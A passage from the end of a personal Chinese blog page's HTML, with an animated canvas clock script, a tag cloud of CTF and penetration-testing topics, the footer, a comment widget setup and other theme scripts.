                          [1,1,1,1,1,1,1]
                      ],//2
                      [
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,1,0,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//3
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,0],
                          [0,0,1,1,1,1,0],
                          [0,1,1,0,1,1,0],
                          [1,1,0,0,1,1,0],
                          [1,1,1,1,1,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,1,1]
                      ],//4
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,1,1,1,1,0],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//5
                      [
                          [0,0,0,0,1,1,0],
                          [0,0,1,1,0,0,0],
                          [0,1,1,0,0,0,0],
                          [1,1,0,0,0,0,0],
                          [1,1,0,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//6
                      [
                          [1,1,1,1,1,1,1],
                          [1,1,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,0,0,1,1,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0],
                          [0,0,1,1,0,0,0]
                      ],//7
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,1,1,0]
                      ],//8
                      [
                          [0,1,1,1,1,1,0],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [1,1,0,0,0,1,1],
                          [0,1,1,1,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,0,1,1],
                          [0,0,0,0,1,1,0],
                          [0,0,0,1,1,0,0],
                          [0,1,1,0,0,0,0]
                      ],//9
                      [
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0],
                          [0,1,1,0],
                          [0,1,1,0],
                          [0,0,0,0],
                          [0,0,0,0]
                      ]//:
                  ];

  		function drawDatetime(cxt){
  			var nums = [];

  			context.fillStyle="#005eac"
  			var date = new Date();
  			var offsetX = 70, offsetY = 30;
  			var hours = date.getHours();
  			var num1 = Math.floor(hours/10);
  			var num2 = hours%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var minutes = date.getMinutes();
  			var num1 = Math.floor(minutes/10);
  			var num2 = minutes%10;
  			nums.push({num: num1});
  			nums.push({num: num2});
  			nums.push({num: 10}); //冒号
  			var seconds = date.getSeconds();
  			var num1 = Math.floor(seconds/10);
  			var num2 = seconds%10;
  			nums.push({num: num1});
  			nums.push({num: num2});

  			for(var x = 0;x<nums.length;x++){
  				nums[x].offsetX = offsetX;
  				offsetX = drawSingleNumber(offsetX,offsetY, nums[x].num,cxt);
  				//两个数字连一块，应该间隔一些距离
  				if(x<nums.length-1){
  					if((nums[x].num!=10) &&(nums[x+1].num!=10)){
  						offsetX+=NUMBER_GAP;
  					}
  				}
  			}

  			//说明这是初始化
  			if(currentNums.length ==0){
  				currentNums = nums;
  			}else{
  				//进行比较
  				for(var index = 0;index<currentNums.length;index++){
  					if(currentNums[index].num!=nums[index].num){
  						//不一样时，添加彩色小球
  						addBalls(nums[index]);
  						currentNums[index].num=nums[index].num;
  					}
  				}
  			}
  			renderBalls(cxt);
  			updateBalls();

  			return date;
  		}

  		function addBalls (item) {
  			var num = item.num;
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						var ball={
  							offsetX:item.offsetX+RADIUS+RADIUS*2*x,
  							offsetY:30+RADIUS+RADIUS*2*y,
  							color:colors[Math.floor(Math.random()*colors.length)],
  							g:1.5+Math.random(),
  							vx:Math.pow(-1, Math.ceil(Math.random()*10))*4+Math.random(),
  							vy:-5
  						}
  						balls.push(ball);
  					}
  				}
  			}
  		}

  		function renderBalls(cxt){
  			for(var index = 0;index<balls.length;index++){
  				cxt.beginPath();
  				cxt.fillStyle=balls[index].color;
  				cxt.arc(balls[index].offsetX, balls[index].offsetY, RADIUS, 0, 2*Math.PI);
  				cxt.fill();
  			}
  		}

  		function updateBalls () {
  			var i =0;
  			for(var index = 0;index<balls.length;index++){
  				var ball = balls[index];
  				ball.offsetX += ball.vx;
  				ball.offsetY += ball.vy;
  				ball.vy+=ball.g;
  				if(ball.offsetY > (WINDOW_HEIGHT-RADIUS)){
  					ball.offsetY= WINDOW_HEIGHT-RADIUS;
  					ball.vy=-ball.vy*u;
  				}
  				if(ball.offsetX>RADIUS&&ball.offsetX<(WINDOW_WIDTH-RADIUS)){

  					balls[i]=balls[index];
  					i++;
  				}
  			}
  			//去除出边界的球
  			for(;i<balls.length;i++){
  				balls.pop();
  			}
  		}
  		function drawSingleNumber(offsetX, offsetY, num, cxt){
  			var numMatrix = digit[num];
  			for(var y = 0;y<numMatrix.length;y++){
  				for(var x = 0;x<numMatrix[y].length;x++){
  					if(numMatrix[y][x]==1){
  						cxt.beginPath();
  						cxt.arc(offsetX+RADIUS+RADIUS*2*x,offsetY+RADIUS+RADIUS*2*y,RADIUS,0,2*Math.PI);
  						cxt.fill();
  					}
  				}
  			}
  			cxt.beginPath();
  			offsetX += numMatrix[0].length*RADIUS*2;
  			return offsetX;
  		}

  		var canvas = document.getElementById("canvas");
  		canvas.width=WINDOW_WIDTH;
  		canvas.height=WINDOW_HEIGHT;
  		context = canvas.getContext("2d");

  		//记录当前绘制的时刻
  		var currentDate = new Date();

  		setInterval(function(){
  			//清空整个Canvas，重新绘制内容
  			context.clearRect(0, 0, context.canvas.width, context.canvas.height);
  			drawDatetime(context);
  		}, 50)
})();
</script>


      


<!--添加标签云-->
        
          <script type="text/javascript" charset="utf-8" src="/js/tagcloud.js"></script>
          <script type="text/javascript" charset="utf-8" src="/js/tagcanvas.js"></script>
          <div class="widget-wrap">
            <div>标签云</div>
            <div id="myCanvasContainer" class="widget tagcloud">
              <canvas width="250" height="250" id="resCanvas" style="width=100%">
              <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/C/" rel="tag">C</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/CTF/" rel="tag">CTF</a><span class="tag-list-count">70</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/HTTP%E5%A4%B4%E9%83%A8%E4%BF%A1%E6%81%AF%E5%88%86%E6%9E%90/" rel="tag">HTTP头部信息分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E4%BC%AA%E5%8D%8F%E8%AE%AE/" rel="tag">PHP伪协议</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/PHP%E7%89%B9%E6%80%A7/" rel="tag">PHP特性</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RE/" rel="tag">RE</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL/" rel="tag">SQL</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web/" rel="tag">Web</a><span class="tag-list-count">14</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Web%E5%B7%A5%E5%85%B7%E5%8C%85/" rel="tag">Web工具包</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/awd/" rel="tag">awd</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctfshow/" rel="tag">ctfshow</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/misc/" rel="tag">misc</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/next%E4%B8%BB%E9%A2%98%E5%A4%B1%E6%95%88/" rel="tag">next主题失效</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sqlmap/" rel="tag">sqlmap</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web/" rel="tag">web</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/wp/" rel="tag">wp</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xss/" rel="tag">xss</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/xxe/" rel="tag">xxe</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%B8%8D%E8%92%9C%E5%AD%90%E4%B8%8D%E6%98%BE%E7%A4%BA/" rel="tag">不蒜子不显示</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2/" rel="tag">博客</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E4%B8%BB%E9%A2%98%E4%BC%98%E5%8C%96/" rel="tag">博客主题优化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E6%AD%BB%E5%BE%AA%E7%8E%AF%E6%A1%86%E6%9E%B6%E9%97%AE%E9%A2%98/" rel="tag">博客死循环框架问题</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8D%9A%E5%AE%A2%E9%83%A8%E5%88%86%E9%97%AE%E9%A2%98%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/" rel="tag">博客部分问题解决方法</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">反序列化</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/" rel="tag">命令执行</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B1%80%E5%9F%9F%E7%BD%91%E6%94%BB%E5%87%BB/" rel="tag">局域网攻击</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%B8%B8%E7%94%A8%E6%8C%87%E4%BB%A4/" rel="tag">常用指令</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%BF%83%E5%BE%97/" rel="tag">心得</a><span class="tag-list-count">2</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" rel="tag">文件上传漏洞</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/" rel="tag">文件包含</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B5%81%E9%87%8F%E5%88%86%E6%9E%90/" rel="tag">流量分析</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F/" rel="tag">渗透</a><span class="tag-list-count">4</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a><span class="tag-list-count">5</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" rel="tag">漏洞复现</a><span class="tag-list-count">3</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E7%95%99%E8%A8%80%E6%9D%BF/" rel="tag">留言板</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E8%B5%9B%E5%90%8E%E5%A4%8D%E7%9B%98/" rel="tag">赛后复盘</a><span class="tag-list-count">54</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%BB%91%E7%9B%92%E6%B5%8B%E8%AF%95/" rel="tag">黑盒测试</a><span class="tag-list-count">1</span></li></ul>
              </canvas>
            </div>
         </div>
        
	  



 
	  
	  


   </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        
  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">豫ICP备2022003011号-1 </a>
      <img src="/images/beian.png" style="display: inline-block;"><a href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=%E8%B1%AB%E5%85%AC%E7%BD%91%E5%AE%89%E5%A4%87%2041142602000197%E5%8F%B7" rel="noopener" target="_blank">豫公网安备 41142602000197号 </a>
  </div>


<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
   </span>
  <span class="author" itemprop="copyrightHolder">故里</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
    <span title="站点总字数">1.1m</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    <span title="站点阅读时长">16:42</span>
</div>







<section class="footer-time">
    <span class="footer__copyright">
    <div>
    <span id="span_dt_dt"> </span>
    <script language="javascript">
      function show_date_time(){
        window.setTimeout("show_date_time()", 1000);
        BirthDay=new Date("12/25/2021 10:56:12");//这个日期是可以修改的
        today=new Date();
        timeold=(today.getTime()-BirthDay.getTime());//其实仅仅改了这里
        sectimeold=timeold/1000
        secondsold=Math.floor(sectimeold);
        msPerDay=24*60*60*1000
        e_daysold=timeold/msPerDay
        daysold=Math.floor(e_daysold);
        e_hrsold=(e_daysold-daysold)*24;
        hrsold=Math.floor(e_hrsold);
        e_minsold=(e_hrsold-hrsold)*60;
        minsold=Math.floor((e_hrsold-hrsold)*60);
        seconds=Math.floor((e_minsold-minsold)*60);
        span_dt_dt.innerHTML="我已在此等候你 "+daysold+" 天 "+hrsold+" 小时 "+minsold+" 分 "+seconds+" 秒";
      }
      show_date_time();
    </script>
    </div>
	
	




<!--这一段是不蒜子的访问量统计代码-->
<script async src="http://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
我的第<span id="busuanzi_value_site_uv"></span>位朋友
历经<span id="busuanzi_value_site_pv"></span>次回眸才与你相遇</span>

	 
	 
	 

<a target="_blank" rel="noopener" href="https://www.upyun.com/?utm_source=lianmeng&amp;utm_medium=referra"><img src="https://z4a.net/images/2022/05/31/image649ac1128183cf97.png"align="absmiddle" width="59px" height="30px" /></a>



        
<div class="busuanzi-count">
  <script data-pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item;">
      <span class="post-meta-item-icon">
        <i class="eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  


  
  

  
  <script color='255,255,225' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.min.js"></script>
  <script src="//img.hzy2003628.top/busuanzi/jquery.fancybox.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '.languages',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[data-pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.dataset.pjax !== undefined) {
      script.dataset.pjax = '';
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>




  
  <script data-pjax>
    (function(){
      var canonicalURL, curProtocol;
      //Get the <link> tag
      var x=document.getElementsByTagName("link");
		//Find the last canonical URL
		if(x.length > 0){
			for (i=0;i<x.length;i++){
				if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){
					canonicalURL=x[i].href;
				}
			}
		}
    //Get protocol
	    if (!canonicalURL){
	    	curProtocol = window.location.protocol.split(':')[0];
	    }
	    else{
	    	curProtocol = canonicalURL.split(':')[0];
	    }
      //Get current URL if the canonical URL does not exist
	    if (!canonicalURL) canonicalURL = window.location.href;
	    //Assign script content. Replace current URL with the canonical URL
      !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})();
  </script>




  
<script src="/js/local-search.js"></script>















    <div id="pjax">
  

  


  

  <script src="/js/activate-power-mode.min.js"></script>
  <script>
    POWERMODE.colorful = true;
    POWERMODE.shake = false;
    document.body.addEventListener('input', POWERMODE);
  </script>


<script>
NexT.utils.loadComments(document.querySelector('#valine-comments'), () => {
  NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
    var GUEST = ['nick', 'mail', 'link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item => {
      return GUEST.includes(item);
    });
    new Valine({
      el         : '#valine-comments',
      verify     : false,
      notify     : true,
      appId      : 'kkHz96fwDwdnhN10VTUS0KUx-gzGzoHsz',
      appKey     : '3th47KWUKTQ2oX3tNXqz6WQW',
      placeholder: "来留下你的痕迹吧",
      avatar     : 'retro',
      meta       : guest,
      pageSize   : '10' || 10,
      visitor    : true,
      lang       : '' || 'zh-cn',
      path       : location.pathname,
      recordIP   : true,
      serverURLs : ''
    });
  }, window.Valine);
});
</script>

    </div>




  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
          if(result)$(this).text('复制成功')
          else $(this).text('复制失败')
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>







</body>
</html>



<script type="text/javascript" src="/js/love.js"></script>




<script type="text/javascript">
    var OriginTitile=document.title,st;
	document.addEventListener("visibilitychange",function(){
        document.hidden?(document.title="ヽ(●-`Д´-)ノ网页崩溃了",clearTimeout(st)):(document.title="(Ő∀Ő3)ノ骗你的，别走了！",st=setTimeout(function(){document.title=OriginTitile},3e3))
    })
</script>


